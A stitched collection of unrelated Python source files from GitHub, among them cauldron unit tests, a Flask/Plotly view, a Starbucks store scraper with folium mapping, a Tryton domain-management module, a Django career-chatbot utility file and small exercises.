'cd.step.breathe()',
'cd.shared.test = 1',
'cd.step.stop(halt=True)',
'cd.shared.test = 2'
]))
support.add_step(self, contents='\n'.join([
'import cauldron as cd',
'cd.shared.test = 3'
]))
support.run_command('run')
project = cd.project.get_internal_project()
step = project.steps[1]
self.assertEqual(project.shared.fetch('test'), 1)
self.assertNotEqual(-1, step.dom.find('cd-StepStop'))
def test_stop_project(self):
"""
Should stop the step early and not continue running future steps
because the project was halted.
"""
support.create_project(self, 'homer3')
support.add_step(self, contents='\n'.join([
'import cauldron as cd',
'cd.shared.test = 0',
'cd.step.breathe()',
'cd.shared.test = 1',
'cd.project.stop()',
'cd.shared.test = 2'
]))
support.add_step(self, contents='\n'.join([
'import cauldron as cd',
'cd.shared.test = 3'
]))
support.run_command('run')
project = cd.project.get_internal_project()
step = project.steps[1]
self.assertEqual(project.shared.fetch('test'), 1)
self.assertNotEqual(-1, step.dom.find('cd-StepStop'))
def test_stop_step_no_halt(self):
"""
Should stop the step early but continue running future steps
"""
support.create_project(self, 'homer2')
support.add_step(self, contents='\n'.join([
'import cauldron as cd',
'cd.shared.test = 0',
'cd.shared.other = 0',
'cd.step.breathe()',
'cd.shared.test = 1',
'cd.step.stop()',
'cd.shared.test = 2'
]))
support.add_step(self, contents='\n'.join([
'import cauldron as cd',
'cd.shared.other = 1'
]))
support.run_command('run')
project = cd.project.get_internal_project()
step = project.steps[1]
self.assertEqual(project.shared.fetch('test'), 1)
self.assertEqual(project.shared.fetch('other'), 1)
self.assertNotEqual(-1, step.dom.find('cd-StepStop'))
def test_stop_step_silent(self):
"""Should stop the step early and silently"""
contents = '\n'.join([
'import cauldron as cd',
'cd.shared.test = 0',
'cd.step.breathe()',
'cd.shared.test = 1',
'cd.step.stop(silent=True)',
'cd.shared.test = 2'
])
support.create_project(self, 'homeritis')
support.add_step(self, contents=contents)
support.run_command('run')
project = cd.project.get_internal_project()
step = project.steps[0]
self.assertEqual(project.shared.fetch('test'), 1)
self.assertEqual(-1, step.dom.find('cd-StepStop'))
@patch(
'cauldron.session.exposed.ExposedProject.internal_project',
new_callable=PropertyMock
)
@patch('time.sleep')
def test_get_internal_project(
self,
sleep: MagicMock,
internal_project: PropertyMock
):
"""
Should get internal project on the third attempt after one
attempt to check before entering the retry and sleep loop
and then two iterations through the loop before encountering
a non-None value.
"""
project = exposed.ExposedProject()
internal_project.side_effect = [None, None, None, 'test']
result = project.get_internal_project()
self.assertEqual('test', result)
self.assertEqual(2, sleep.call_count)
@patch(
'cauldron.session.exposed.ExposedProject.internal_project',
new_callable=PropertyMock
)
@patch('time.time')
@patch('time.sleep')
def test_get_internal_project_fail(
self,
sleep: MagicMock,
time_time: MagicMock,
internal_project: PropertyMock
):
"""
Should fail to get internal project and return None after
eventually timing out.
"""
project = exposed.ExposedProject()
time_time.side_effect = range(20)
internal_project.return_value = None
result = project.get_internal_project()
self.assertIsNone(result)
self.assertEqual(10, sleep.call_count)
@patch(
'cauldron.session.exposed.ExposedStep._step',
new_callable=PropertyMock
)
def test_write_to_console(self, _step: PropertyMock):
"""
Should write to the console using a write_source function
call on the internal step report's stdout_interceptor.
"""
trials = [2, True, None, 'This is a test', b'hello']
for message in trials:
_step_mock = MagicMock()
write_source = MagicMock()
_step_mock.report.stdout_interceptor.write_source = write_source
_step.return_value = _step_mock
step = exposed.ExposedStep()
step.write_to_console(message)
args, kwargs = write_source.call_args
self.assertEqual('{}'.format(message), args[0])
@patch(
'cauldron.session.exposed.ExposedStep._step',
new_callable=PropertyMock
)
def test_render_to_console(self, _step: PropertyMock):
"""
Should render to the console using a write_source function
call on the internal step report's stdout_interceptor.
"""
message = ' {{ a }} is not {{ b }}.'
_step_mock = MagicMock()
write_source = MagicMock()
_step_mock.report.stdout_interceptor.write_source = write_source
_step.return_value = _step_mock
step = exposed.ExposedStep()
step.render_to_console(message, a=7, b='happy')
args, kwargs = write_source.call_args
self.assertEqual('7 is not happy.', args[0])
@patch(
'cauldron.session.exposed.ExposedStep._step',
new_callable=PropertyMock
)
def test_write_to_console_fail(self, _step: PropertyMock):
"""
Should raise a ValueError when there is no current step to operate
upon by the write function call.
"""
_step.return_value = None
step = exposed.ExposedStep()
with self.assertRaises(ValueError):
step.write_to_console('hello')
@patch('cauldron.render.stack.get_formatted_stack_frame')
def test_render_stop_display(self, get_formatted_stack_frame: MagicMock):
"""Should render stop display without error"""
get_formatted_stack_frame.return_value = [
{'filename': 'foo'},
{'filename': 'bar'},
{'filename': os.path.realpath(exposed.__file__)}
]
step = MagicMock()
exposed.render_stop_display(step, 'FAKE')
self.assertEqual(1, step.report.append_body.call_count)
@patch('cauldron.templating.render_template')
@patch('cauldron.render.stack.get_formatted_stack_frame')
def test_render_stop_display_error(
self,
get_formatted_stack_frame: MagicMock,
render_template: MagicMock
):
"""
Should render an empty stack frame when the stack data is invalid.
"""
get_formatted_stack_frame.return_value = None
step = MagicMock()
exposed.render_stop_display(step, 'FAKE')
self.assertEqual({}, render_template.call_args[1]['frame'])
def test_project_path(self):
"""Should create an absolute path within the project."""
ep = exposed.ExposedProject()
project = MagicMock()
project.source_directory = os.path.realpath(os.path.dirname(__file__))
ep.load(project)
result = ep.path('hello.md')
self.assertTrue(result.endswith('{}hello.md'.format(os.sep)))
| sernst/cauldron | cauldron/test/projects/test_exposed.py | test_exposed.py | py | 11,244 | python | en | code | 78 | github-code | 90 |
4483613818 | from flask import render_template
from . import main
import plotly
import plotly.graph_objs as go
import json
def create_plot():
trace_1 = go.Scatter(
x=(1,2,3),
y=(1,2,3),
mode='lines+markers',
name ='Player_1')
trace_2 = go.Scatter(
x=(1,2,3),
y=(2,3,4),
mode='lines+markers',
name = 'Player_2')
data = [trace_1, trace_2]
graphJSON = json.dumps(data, cls=plotly.utils.PlotlyJSONEncoder)
return graphJSON
@main.route('/')
def index():
bar = create_plot()
return render_template('index.html', plot = bar)
| rbekeris/databakery | Dash_app_0_1/Webapp/Bakerapp/main/views.py | views.py | py | 746 | python | en | code | 0 | github-code | 90 |
18989244981 | import psycopg2
from base64 import encode
from numpy import disp
try:
conexion = psycopg2.connect(
host = "localhost",
port = "5432",
user = "postgres",
password = "2807289050109",
dbname = "postgres"
)
print("Conexión exitosa")
except psycopg2.Error as e:
print("Ocurrió un error en la conexión")
print("Verifique los parámetros")
cursor = conexion.cursor()
numero1 = int(input('modelo: '))
numero2 = int(input('Kilometraje: '))
if ((numero1<2007)and(numero2>20)):
disp('Renovar')
total = ('Renovar');
cursor.execute("insert into tareapreparatoria1(ejercicio, total) values(%s, %s);",('Ejercicio 14', total))
conexion.commit()
elif ((numero1>=2007)and(numero2<=2013)and (numero2>=20000)):
disp ('Mantenimiento')
total = ('Mantenimiento');
cursor.execute("insert into tareapreparatoria1(ejercicio, total) values(%s, %s);",('Ejercicio 14', total))
conexion.commit()
elif((numero1>2013)and(numero2<10000)):
disp('Optimas condiciones')
total = ('Optimas condiciones');
cursor.execute("insert into tareapreparatoria1(ejercicio, total) values(%s, %s);",('Ejercicio 14', total))
conexion.commit()
else:
disp('Mecanico')
total = ('Mecanico');
cursor.execute("insert into tareapreparatoria1(ejercicio, total) values(%s, %s);",('Ejercicio 14', total))
conexion.commit()
cursor.close()
conexion.close()
encode | kiwiii22/tareaprep1 | P14.py | P14.py | py | 1,493 | python | es | code | 0 | github-code | 90 |
5219369166 | # -*-coding:utf-8 -*-
import requests
import json
import folium
#pip install folium
def getSido():
url = 'https://www.starbucks.co.kr/store/getSidoList.do'
resp = requests.post(url)
#print(resp.json())
#print(resp.json()['list'])
sido_json = resp.json()['list']
sido_code = list(map(lambda x: x['sido_cd'], sido_json))
sido_name = list(map(lambda x: x['sido_nm'], sido_json))
sido_dict = dict(zip(sido_code, sido_name))
return sido_dict
def getGuGun(sido_code):
url ='https://www.starbucks.co.kr/store/getGugunList.do'
resp = requests.post(url, data={'sido_cd':sido_code})
gugun_json = resp.json()['list']
gugun_dict =dict(zip(list(map(lambda x: x['gugun_cd'], gugun_json)), list(map(lambda x: x['gugun_nm'], gugun_json))))
return gugun_dict
def getStore(sido_code='', gugun_code=''):
url = 'https://www.starbucks.co.kr/store/getStore.do'
# 알맞은 데이터를 보내면서 요청하여,
# s_name : "역삼이마트", tel: "1522-3232"}, {..}, ...] 로 출력하라.
'''
ins_lat: 37.4865643
'''
resp = requests.post(url, data={'ins_lat': '37.4865643',
'ins_lng': '127.0206673',
'p_sido_cd': sido_code,
'p_gugun_cd': gugun_code,
'in_biz_cd': '',
'set_date': '' })
#print(resp.json())
store_json = resp.json()['list']
store_list = list()
for store in store_json:
store_dict = dict()
store_dict['s_name']= store['s_name']
store_dict['dro_address'] = store['doro_address']
store_dict['tel'] = store['tel']
store_dict['lat'] = store['lat']
store_dict['lot'] = store['lot']
store_list.append(store_dict)
#print(store_list)
# res_dict = dict()
# res_dict['store_list'] = store_list
#
# result = json.dumps(res_dict, ensure_ascii=False)
#
# make_map(res_dict)
return store_list
def make_map(result):
#{"store_list": [{"s_name": "역삼이마트", "dro_address": "서울특별시 강남구 역삼로 310 (역삼동)", "tel": "1522-3232", "lat": "37.499367", "lot": "127.048425"}, ... ]
min_lat = min(list(map(lambda x: x['lat'], result['store_list'])))
max_lat = max(list(map(lambda x: x['lat'], result['store_list'])))
min_lot = max(list(map(lambda x: x['lot'], result['store_list'])))
max_lot = max(list(map(lambda x: x['lot'], result['store_list'])))
# 중간 좌표
center_lat = float(max_lat) - (float(max_lat) - float(min_lat))/2
center_lot = float(max_lot) - (float(max_lot) - float(min_lot))/2
#zoom_start 하는위치 좌표(위도 경도)값 , zoom_start=18이 max
m = folium.Map(location=[center_lat, center_lot], zoom_start=14)
for data in result['store_list']:
popup = folium.Popup(folium.Html(data['s_name']), max_width=len(data['s_name'])*30) # 마커위에 클릭시 문구
folium.Marker( # 마커 표시
location=[data['lat'], data['lot']],
popup=popup, #팝업 만든거 연결
icon=folium.Icon(color='red')
).add_to(m)
m.save('result.html') #result.html로 저장한다.
if __name__ == '__main__':
'''
print(getSido())
sido = input('도시 코드를 입력해 주세요 : ')
if sido == '17':
print(getStore(sido_code=sido))
else:
print(getGuGun(sido))
gugun = input('구군 코드를 입력해 주세요 :')
print(getStore(gugun_code=gugun))
'''
korea_starbucks = list()
# 1. getSido 함수를 통해서 전국의 sido_code 가져온다
sido_all = getSido()
# 2. 1번에서 가지고 온 sido_code를 반복해서 getGuGun의 매개변수로 넣어준다.
# 2-1. 만일, sido_code가 17 (세종시) 인 경우, getStore의 매개변수로 넣어준다.
for sido in sido_all:
if sido == '17':
result = getStore(sido_code= sido)
#print(result)
korea_starbucks.extend(result) # 연결
else:
gugun_all = getGuGun(sido)
for gugun in gugun_all:
result = getStore(gugun_code= gugun)
#print(result)
korea_starbucks.extend(result)
# 3. getStore에서 리턴된 리스트를 korea_starbucks.extend 함수를 통해 합쳐준다.
# 4. korea_starbucks를 {'list': [{}, {}, ... ]} 형태의 json으로 저장한다.
starbucks_dict = dict()
starbucks_dict['list'] = korea_starbucks
result = json.dumps(starbucks_dict, ensure_ascii=False)
with open('starbucks.json', 'w', encoding='utf-8') as f:
f.write(result)
| YuDeokRin/Encore_Python | Python06/star/starbucks03.py | starbucks03.py | py | 4,903 | python | ko | code | 0 | github-code | 90 |
39849008693 | from trytond.model import ModelView, ModelSQL, fields
from trytond.transaction import Transaction
from trytond.pool import Pool
from trytond.pyson import If, Eval, Bool
import datetime
__all__ = ['Domain', 'Renewal', 'DomainProduct']
class Domain(ModelSQL, ModelView):
'Domain'
__name__ = 'internetdomain.domain'
company = fields.Many2One('company.company', 'Company', required=True,
domain=[
('id', If(Eval('context', {}).contains('company'), '=', '!='),
Eval('context', {}).get('company', 0)),
])
name = fields.Char('Name', required=True)
date_create = fields.Date('Date Create',
required=True)
date_expire = fields.Function(fields.Date('Date expired'),
'get_expire', searcher='search_expire')
warning = fields.Function(fields.Boolean('Warning expired'),
'get_warning')
party = fields.Many2One('party.party', 'Party', required=True)
party_address = fields.Many2One('party.address', 'Address',
required=True, depends=['party'],
domain=[('party', '=', Eval('party'))])
registrator = fields.Function(fields.Many2One('party.party', 'Registrator'),
'get_registrator')
registrator_website = fields.Function( fields.Char('Website'),
'get_registrator_website')
dns1 = fields.Char('DNS Primary')
dns2 = fields.Char('DNS Secundary')
dns3 = fields.Char('DNS Secundary (2)')
dns4 = fields.Char('DNS Secundary (3)')
ip = fields.Char('IP')
comment = fields.Text('Comment')
active = fields.Boolean('Active')
renewal = fields.One2Many('internetdomain.renewal', 'domain', 'Renewals',
order=[('date_renewal', 'DESC')])
products = fields.Many2Many('internetdomain.domain-domain.product',
'domain', 'product', 'Products')
@staticmethod
def default_active():
return True
@staticmethod
def default_company():
return Transaction().context.get('company')
@classmethod
def view_attributes(cls):
return [('/tree', 'colors',
If(Bool(Eval('warning')), 'red', 'black'))]
def get_last_renewal(self):
"""Get last renewal from domain"""
renewal = False
Renewal = Pool().get('internetdomain.renewal')
renewals = Renewal.search(
[('domain', '=', self.id)],
order=[('date_renewal', 'DESC')]
)
if len(renewals)>0:
renewal = Renewal(renewals[0].id)
return renewal
def get_registrator(self, name=None):
"""Get registrator from domain"""
renewal = self.get_last_renewal()
return renewal and renewal.registrator.id or None
def get_registrator_website(self, name=None):
"""Get registrator website from domain"""
renewal = self.get_last_renewal()
return renewal and renewal.registrator.website or None
def get_expire(self, name=None):
"""Get expire date from domain"""
renewal = self.get_last_renewal()
return renewal and renewal.date_expire or None
@classmethod
def search_expire(cls, name, clause):
return [('renewal.date_expire',) + tuple(clause[1:])]
@classmethod
def get_warning(cls, records, name):
"""Get warning if last registration pass today"""
result = {}
for domain in records:
warning_expire = False
if not domain.company.idomain_alert_expire:
max_alert = 30 #30 days
else:
intdomain_alert_expire = domain.company.idomain_alert_expire.split(',')
intdomain_alert_expire = [int(x) for x in intdomain_alert_expire]
max_alert = intdomain_alert_expire[0]
for x in intdomain_alert_expire:
if x > max_alert:
max_alert = x
if domain.date_expire:
today = datetime.date.today()
date_exp = domain.date_expire
diff_date = datetime.timedelta()
diff_date = date_exp - today
if diff_date.days <= max_alert:
warning_expire = True
result[domain.id] = warning_expire
return result
@fields.depends('party', 'party_address')
def on_change_party(self):
if self.party and not self.party_address:
address = self.party.address_get()
self.party_address = address
@fields.depends('registrator')
def on_change_registrator(self):
"""When change registrator, get website value"""
Party = Pool().get('party.party')
if self.registrator:
party = Party.browse([self.registrator])[0]
self.registrator_website = party.website and \
party.website or None
class Renewal(ModelSQL, ModelView):
'Renewal'
__name__ = 'internetdomain.renewal'
domain = fields.Many2One('internetdomain.domain', 'Domain',
ondelete='CASCADE', select=True, required=True)
date_renewal = fields.Date('Date Renewal', required=True)
date_expire = fields.Date('Date Expire', required=True)
registrator = fields.Many2One('party.party', 'Registrator', required=True)
comment = fields.Text('Comment')
class DomainProduct(ModelSQL):
'Domain - Product'
__name__ = 'internetdomain.domain-domain.product'
_table = 'internetdomain_domain_product_rel'
domain = fields.Many2One('internetdomain.domain', 'Domain', ondelete='CASCADE',
required=True, select=True)
product = fields.Many2One('product.product', 'Product',
ondelete='CASCADE', required=True, select=True)
| NaN-tic/trytond-internetdomain | internetdomain.py | internetdomain.py | py | 5,670 | python | en | code | 0 | github-code | 90 |
12675139791 | """Utility methods."""
import hashlib
def equal_dicts(a, b, ignore_keys):
"""Compare two dicts, withholding a set of keys.
From: http://stackoverflow.com/a/10480904/383744
"""
ka = set(a).difference(ignore_keys)
kb = set(b).difference(ignore_keys)
return ka == kb and all(a[k] == b[k] for k in ka)
def file_md5(fname):
"""Get md5 hash for a file.
From: https://stackoverflow.com/a/3431838/383744
"""
hash_md5 = hashlib.md5()
with open(fname, "rb") as f:
for chunk in iter(lambda: f.read(4096), b""):
hash_md5.update(chunk)
return hash_md5.hexdigest()
def read_in_chunks(f, chunk_size=51200000):
"""Read file in 50 MB (default) chunks)."""
while True:
data = f.read(chunk_size)
if not data:
break
yield data
| radusuciu/ip2api | ip2api/utils.py | utils.py | py | 826 | python | en | code | 1 | github-code | 90 |
1757847495 | from django.db.models import Count
from Level_Up_App.models import CareerSkills, CareerPosition, Skill, Job, GenericInfo, CareerPathMap, ChatbotVar
from Level_Up_App.courserecommendationrules import CourseRecommender, SkillGapsFact, recommendedcourses
from Level_Up_App.jobrecommendationrules import getJobRecommendation
from Level_Up_App.careerknowledgegraph import *
from Level_Up_App.CareerPathASTARSearch import *
def getJobCompetency(jobtitle):
jobcompetency = list()
careerpos = CareerPosition.objects.get(name=jobtitle)
filterCareerPos = CareerSkills.objects.get(careerpos=careerpos)
skillreq = filterCareerPos.skillRequired.all()
if len(skillreq) > 20:
skillreq = skillreq[:20]
for skill in skillreq:
jobcompetency.append(str(skill))
return jobcompetency
def getHighestDemandJob():
highest = 0
allcareerpos = CareerPosition.objects.all()
hdjob = allcareerpos[0].name
for pos in allcareerpos:
count = Job.objects.filter(name=pos).count()
if count > highest:
highest = count
hdjob = pos.name
return hdjob
def getJobEducationLevel(jobtitle):
return str(queryGenericInfo(jobtitle).eduLvl)
def getJobSalary(jobtitle):
return str(queryGenericInfo(jobtitle).salaryRange)
def getJobDescription(jobtitle):
return str(queryGenericInfo(jobtitle).description)
def getJobMinYearsExperience(jobtitle):
return str(queryGenericInfo(jobtitle).minYears)
def queryGenericInfo(jobtitle):
careerpos = CareerPosition.objects.get(name=jobtitle)
return GenericInfo.objects.get(title=careerpos)
def getCareerPath(currentjobtitle, aspiredjobtitle):
cpkg = CareerPathKnowledgeGraph()
ckm = cpkg.getCareerKnowledgeMap()
cph = cpkg.getCareerPathHeuristic()
return searchCareerPath(ckm, cph, currentjobtitle, aspiredjobtitle)
#****************************************
# Methods for elicit competence : START
#****************************************
def elicit_competence_with_endgoal(currPos, endGoal):
# Get career path
cost, careerPath = getCareerPath(currPos, endGoal)
# Get next pos from career path
nextpos = careerPath[1]
# Get list of competencies to ask user
compList = getListofCompetencetoAskUserWithCRoadMap(currPos, nextpos)
if len(compList) > 20:
compList = compList[:20]
return compList
def elicit_competence_without_endgoal(currPos):
compList = getListofCompetencetoAskUserWithoutCRoadMap(currPos)
if len(compList) > 20:
compList = compList[:20]
return compList
#****************************************
# Methods for elicit competence : END
#****************************************
#****************************************
# Methods for jobs recomendation : START
#****************************************
def jobsrecommendation_with_endgoal(currPos, endGoal, userCompetence):
if not userCompetence:
return list()
competenceList = elicit_competence_with_endgoal(currPos, endGoal)
competenceList.append(userCompetence)
return wrapJobRecommendation(getJobRecommendation(competenceList))
def jobsrecommendation_without_endgoal(currPos, userCompetence):
if not userCompetence:
return list()
competenceList = elicit_competence_without_endgoal(currPos)
competenceList.append(userCompetence)
return wrapJobRecommendation(getJobRecommendation(competenceList))
#****************************************
# Methods for jobs recommendation : END
#****************************************
#*****************************************
# Methods for course recomendation : START
#*****************************************
def courserecommendation_with_endgoal(currPos, endGoal, userCompetence):
origialCompetenceList = elicit_competence_with_endgoal(currPos, endGoal)
if set(userCompetence) == set(origialCompetenceList):
return list()
remainList = [skills for skills in userCompetence if skills not in origialCompetenceList]
return wrapCourseRecommendation(getCourseRecommendation(remainList))
def courserecommendation_without_endgoal(currPos, userCompetence):
origialCompetenceList = elicit_competence_without_endgoal(currPos)
if set(userCompetence) == set(origialCompetenceList):
return list()
remainList = [skills for skills in userCompetence if skills not in origialCompetenceList]
return wrapCourseRecommendation(getCourseRecommendation(remainList))
def getCourseRecommendation(skillgap):
engine = CourseRecommender()
engine.reset()
engine.declare(SkillGapsFact(skills=skillgap))
engine.run()
return recommendedcourses
#*****************************************
# Methods for course recomendation : END
#*****************************************
def getListofCompetencetoAskUserWithoutCRoadMap(currPos): # Input is a string
currSkillList = getCareerSkillList(currPos)
nextSkillList = getCombinedSkillReqFromNextPos(currPos)
return [skills for skills in nextSkillList if skills not in currSkillList] # This is a list of skills to ask user
def getListofCompetencetoAskUserWithCRoadMap(currPos, nextPos): # Both input are strings
currSkillList = getCareerSkillList(currPos)
nextposSkillList = getCareerSkillList(nextPos)
return [skills for skills in nextposSkillList if skills not in currSkillList] # This is a list of skills to ask user
def getCareerSkillList(pos): # Input is a string
careerpos = CareerPosition.objects.get(name=pos)
careerSkills = CareerSkills.objects.get(careerpos=careerpos)
skillList = list()
for skill in careerSkills.skillRequired.all():
skillList.append(skill)
return skillList # This is a list of all the skills required for this position
def getCombinedSkillReqFromNextPos(currPos): #Input is a string
# Get combined list of next pos
nextposlist = getCombinedListofNextPos(currPos)
nextposskilllist = list()
for pos in nextposlist:
careerSkills = CareerSkills.objects.get(careerpos=pos)
for cs in careerSkills.skillRequired.all():
nextposskilllist.append(cs)
return nextposskilllist # This is a list of skills
def getCombinedListofNextPos(currPos): # Input is string
# Get career path map
careerPathMap = getCareerPathMap(currPos)
nextposlist = list()
for cp in careerPathMap:
nextposlist.append(cp.nextpos)
return nextposlist # This is a list of all next positions available
def getCareerPathMap(currPos): # Input is string
# Get current pos object
currCareerPos = CareerPosition.objects.get(name=currPos)
# Get career path map object filter by career pos object
careerPath = CareerPathMap.objects.filter(initialpos=currCareerPos)
return careerPath # This is a queryset of careerpath
#*****************************************
# Methods for chat bot variable : START
#*****************************************
def getPersona():
cbv = getChatbotVar()
return cbv.get_persona()
def setPersona(persona):
cbv = getChatbotVar()
cbv.set_persona(persona)
cbv.save()
def getCurrentPosition():
cbv = getChatbotVar()
return cbv.get_currentPosition()
def setCurrentPosition(currentPosition):
cbv = getChatbotVar()
cbv.set_currentPosition(currentPosition)
cbv.save()
def getYearsOfWorkingExperience():
cbv = getChatbotVar()
return cbv.get_yearsOfWorkingExperience()
def setYearsOfWorkingExperience(yearsOfWorkingExperience):
cbv = getChatbotVar()
cbv.set_yearsOfWorkingExperience(yearsOfWorkingExperience)
cbv.save()
def getCompanyName():
cbv = getChatbotVar()
return cbv.get_companyName()
def setCompanyName(companyName):
cbv = getChatbotVar()
cbv.set_companyName(companyName)
cbv.save()
def getEmailAddress():
cbv = getChatbotVar()
return cbv.get_emailAddress()
def setEmailAddress(emailAddress):
cbv = getChatbotVar()
cbv.set_emailAddress(emailAddress)
cbv.save()
def getJobInterestedIn():
cbv = getChatbotVar()
return cbv.get_jobInterestedIn()
def setJobInterestedIn(jobInterestedIn):
cbv = getChatbotVar()
cbv.set_jobInterestedIn(jobInterestedIn)
cbv.save()
def getCareerEndGoalPosition():
cbv = getChatbotVar()
return cbv.get_careerEndGoalPosition()
def setCareerEndGoalPosition(careerEndGoalPosition):
cbv = getChatbotVar()
cbv.set_careerEndGoalPosition(careerEndGoalPosition)
cbv.save()
def getCurrentSkillset():
cbv = getChatbotVar()
return cbv.get_currentSkillset()
def setCurrentSkillset(currentSkillset):
cbv = getChatbotVar()
cbv.set_currentSkillset(currentSkillset)
cbv.save()
def getCareerPref():
cbv = getChatbotVar()
return cbv.get_careerPref()
def setCareerPref(careerPref):
cbv = getChatbotVar()
cbv.set_careerPref(careerPref.upper())
cbv.save()
def getCourseSkillRecommendation():
cbv = getChatbotVar()
return cbv.get_courseSkillRecommend()
def setCourseSkillRecommendation(courseSkillRecommend):
cbv = getChatbotVar()
cbv.set_courseSkillRecommend(courseSkillRecommend)
cbv.save()
def getJobSkillRecommendation():
cbv = getChatbotVar()
return cbv.get_jobSkillRecommend()
def setJobSklllRecommendation(jobSkillRecommend):
cbv = getChatbotVar()
cbv.set_jobSkillRecommend(jobSkillRecommend)
cbv.save()
def getChatbotVar():
return ChatbotVar.objects.get(pk=1)
#*****************************************
# Methods for chat bot variable : END
#*****************************************
#*********************************************
# Methods for Facebook button wrapper : START
#*********************************************
def wrapCourseRecommendation(courseList):
clist = courseList
if len(courseList) > 10:
clist = courseList[:10]
resp = {}
resp['fulfillmentText'] = "Error showing course recommendation!"
resp['fulfillmentMessages'] = []
for course in clist:
resp['fulfillmentMessages'].append(
buildCard(
title=course.title,
subtitle=course.coursecode,
imageUrl="https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png",
cardText="Course Link",
cardUrl=course.URL
))
return resp
def wrapJobRecommendation(jobList):
jlist = jobList
if len(jobList) > 10:
jlist = jobList[:10]
resp = {}
resp['fulfillmentText'] = "Error showing job recommendation!"
resp['fulfillmentMessages'] = []
for job in jlist:
resp['fulfillmentMessages'].append(
buildCard(
title=job.title,
subtitle=job.company,
imageUrl="https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png",
cardText="Job Link",
cardUrl=job.URL
))
return resp
def buildCard(title, subtitle, imageUrl, cardText, cardUrl):
card = {
"card": {
"title": title,
"subtitle": subtitle,
"imageUri": imageUrl,
"buttons":[
{
"text": cardText,
"postback": cardUrl
}
]
}
}
return card
#*********************************************
# Methods for Facebook button wrapper : END
#*********************************************
#*********************************************
# Methods for Facebook Cards Text : START
#*********************************************
def signUp():
resp = {}
resp['fulfillmentText'] = "Error showing signup button!"
resp['fulfillmentMessages'] = [
{
"card": {
"title": "Level Up",
"subtitle": "Your Personal Career Coach",
"imageUri": "https://assistant.google.com/static/images/molecule/Molecule-Formation-stop.png",
"buttons":[
{
"text": "Sign Up Here!",
"postback": "https://www.google.com/"
}
]
}
}
]
return resp
def cardsAppend(cardsRec, appendText):
respText = cardsRec
cardsRec['fulfillmentMessages'].append({
"text":{
"text": [appendText]
}
},)
return respText
def cardsWrap(cardsRec, insertText):
respText = cardsRec
cardsRec['fulfillmentMessages'].insert(0,{
"text":{
"text": [insertText]
}
},)
return respText
#*********************************************
# Methods for Facebook Cards Text : END
#*********************************************
| raymondng76/IRS-MR-RS-2019-07-01-IS1FT-GRP-Team10-LevelUp | SystemCode/Level_Up/Level_Up_App/chatbot_util.py | chatbot_util.py | py | 12,615 | python | en | code | 2 | github-code | 90 |
13109668945 | #Este programa irá calcula os juros compostos baseado em uma % de x parcelas de qualquer valor
class Calculadora:
def __init__(self, valor1=0.0, valor2=0.0):
self.valor1= valor1
self.valor2= valor2
def calcular(self, quantidadeParcelas):
valorParcela= (self.valor2)/quantidadeParcelas
juros= self.valor1
valorTotal= 0.0
juros= juros/12 #porcentagem dos juros mensais
while quantidadeParcelas>0:
valorTotal= valorTotal + valorParcela
valorParcela= valorParcela*(1+(juros/100))
quantidadeParcelas= quantidadeParcelas-1
return valorTotal
print("Juros: ")
j= float(input())
print("Qual a quantidade de parcelas: ")
q= int(input())
print("Valor do emprestimo: ")
vTotal= float(input())
calculo= Calculadora(j,vTotal) #pensando em valor1 como juros e valor2 como valor total
vTotal= calculo.calcular(q)
print("Valor total à pagar será: ", vTotal)
print("Valor das pacelas em igual: ", vTotal/6) | YuriFogaca/EstudosPY | calculadoraComposto.py | calculadoraComposto.py | py | 1,004 | python | pt | code | 0 | github-code | 90 |
35043100501 | #! /usr/bin/python3
class DrNabi:
father_of = "Dr.Ayoubzai"
def __init__(self, job, marital):
self.job = job
self.marital = marital
def __str__(self):
return f"({self.job}, {self.marital})"
def like_travel(self):
print(like_travel)
atal = DrNabi("Doctor", "married")
aimal = DrNabi("lawer", "married")
qais = DrNabi("tech", "single")
print(atal)
print(aimal)
print(qais)
| atal2003/Python-Hack-script | linux/ninteenclass.py | ninteenclass.py | py | 437 | python | en | code | 0 | github-code | 90 |
18283031369 | import sys
sys.setrecursionlimit(10 ** 7)
input = sys.stdin.readline
f_inf = float('inf')
mod = 10 ** 9 + 7
def resolve():
n = int(input())
cnt = [[0] * 10 for _ in range(10)]
for i in range(1, n + 1):
i = str(i)
head = int(i[0])
foot = int(i[-1])
cnt[head][foot] += 1
res = 0
for i in range(1, n + 1):
i = str(i)
head = int(i[0])
foot = int(i[-1])
res += cnt[foot][head]
print(res)
if __name__ == '__main__':
resolve()
| Aasthaengg/IBMdataset | Python_codes/p02792/s112589516.py | s112589516.py | py | 519 | python | en | code | 0 | github-code | 90 |
42598355546 | import re
def matched(string):
d = {
'&&': 'and',
'||': 'or'
}
return d[string.group(0)]
pattern = re.compile(r'(?<=\s)&&(?=\s)|(?<=\s)\|\|(?=\s)')
for _ in range(int(input())):
print(re.sub(pattern, matched, input()))
| praneeth14/Hackerrank | Python/Regex and Parsing/Regex Substitution.py | Regex Substitution.py | py | 255 | python | en | code | 1 | github-code | 90 |
18548954009 | import sys
read = sys.stdin.read
readline = sys.stdin.readline
readlines = sys.stdin.readlines
sys.setrecursionlimit(10 ** 9)
INF = 1 << 60
MOD = 1000000007
def main():
A, B, K = map(int, readline().split())
if B - A + 1 < 2 * K:
ans = list(range(A, B + 1))
else:
ans = list(range(A, A + K)) + list(range(B - K + 1, B + 1))
print(*ans, sep='\n')
return
if __name__ == '__main__':
main()
| Aasthaengg/IBMdataset | Python_codes/p03386/s651267619.py | s651267619.py | py | 435 | python | en | code | 0 | github-code | 90 |
11523225301 | import sqlite3
conn = sqlite3.connect("sqlite.db")
print("Student id","Student name","Student class","Student fees")
#inner join
# data = conn.execute("SELECT f.st_id,s.st_name,s.st_class,f.fees_amount from fees as f inner join students as s on f.st_id=s.st_id ")
#left join
data = conn.execute("SELECT f.st_id,s.st_name,s.st_class,f.fees_amount from fees as f left join students as s on f.st_id=s.st_id ")
#right and full join not supported in sqlite3
for n in data:
print(n[0] ,n[1] ,n[2], n[3]) | mrcreator2022/python_database_sqlite3 | join.py | join.py | py | 506 | python | en | code | 0 | github-code | 90 |
7165686230 | import numpy as np
US_IMBLEARN = 'imblearn_undersampled'
US_RANDOM = 'random_undersampled'
US_NO = 'not_undersampled'
SPECIES_ECOLI = 'Escherichia coli'
SPECIES_SAUREUS = 'Staphylococcus aureus'
SPECIES_KLEBSIELLA = 'Klebsiella pneumoniae'
SPECIES_EPIDERMIS = 'Staphylococcus epidermis'
ANTIBIOTIC_CIPROFLOXACIN ='Ciprofloxacin' # all
ANTIBIOTIC_CEFTRIAXONE = 'Ceftriaxone' # no saureus
